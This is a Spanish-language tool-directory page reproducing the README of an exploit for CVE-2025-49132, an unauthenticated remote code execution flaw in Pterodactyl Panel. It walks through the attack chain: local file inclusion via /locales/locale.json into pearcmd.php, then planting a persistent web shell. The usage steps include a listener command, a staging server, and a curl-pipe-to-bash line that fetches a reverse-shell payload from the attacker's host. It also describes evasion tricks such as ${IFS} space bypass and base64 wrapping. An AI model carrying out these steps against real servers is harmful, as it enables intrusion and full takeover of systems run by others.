Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-49132-Mods | Kitploit
Herramientas/GitHubGitHub/malw0re/cve-2025-49132-mods
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubmalw0re/cve-2025-49132-mods

CVE-2025-49132-Mods

Ver Repositorio
122hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-49132 - RCE Simple

Python CVE

📝 Descripción general

Este repositorio contiene un exploit especializado para CVE-2025-49132, una vulnerabilidad crítica de Ejecución Remota de Código (RCE) sin autenticación en Pterodactyl Panel (anteriores a v1.11.11).

La vulnerabilidad existe en el endpoint /locales/locale.json. Al manipular los parámetros de consulta locale y namespace, un atacante puede aprovechar una Inclusión de Archivo Local (LFI) para interactuar con pearcmd.php. Esto permite la creación arbitraria de archivos y la ejecución de comandos, lo que conduce a un compromiso total del sistema.

⚙️ Cadena de explotación

El script ape.py automatiza los siguientes pasos:

Detección de PEAR: Fuzzea la estructura de directorios para localizar la instalación de PEAR en el objetivo.

Creación de backdoor: Utiliza config-create de PEAR para escribir un web shell persistente en /tmp/shell.php.

🚀 Instrucciones de uso

Para lograr un callback exitoso en el objetivo, sigue este flujo de trabajo:

  1. Preparación Listener: Inicia Penelope (o tu listener preferido) en una terminal separada:

penelope -p 4444

Servidor de staging: Si usas un script de shell personalizado, súbelo mediante Python: python3 -m http.server 8080

  1. Ejecución Ejecuta el script en modo interactivo para mantener el control sobre el proceso de explotación:

python3 ape.py --host xxx.xxx.xxx --interactive

  1. Capturando la shell Dentro del prompt shell>, usa el siguiente comando para ejecutar tu payload segmentado:

shell> curl http://<YOUR_IP>:8080/shell.sh | bash

🛡️ Salvaguardas técnicas

Bypass de espacios: Usa automáticamente ${IFS} para garantizar que los payloads sobrevivan al análisis de URL.

Wrapper Base64: Envuelve los comandos de reverse shell en Base64 para evitar la alteración de caracteres por parte del Nginx/servidor web del objetivo.

Gestión de timeouts: Diseñado para detectar cuándo una reverse shell se ha conectado correctamente aunque la petición web se quede colgada.

Descargar herramienta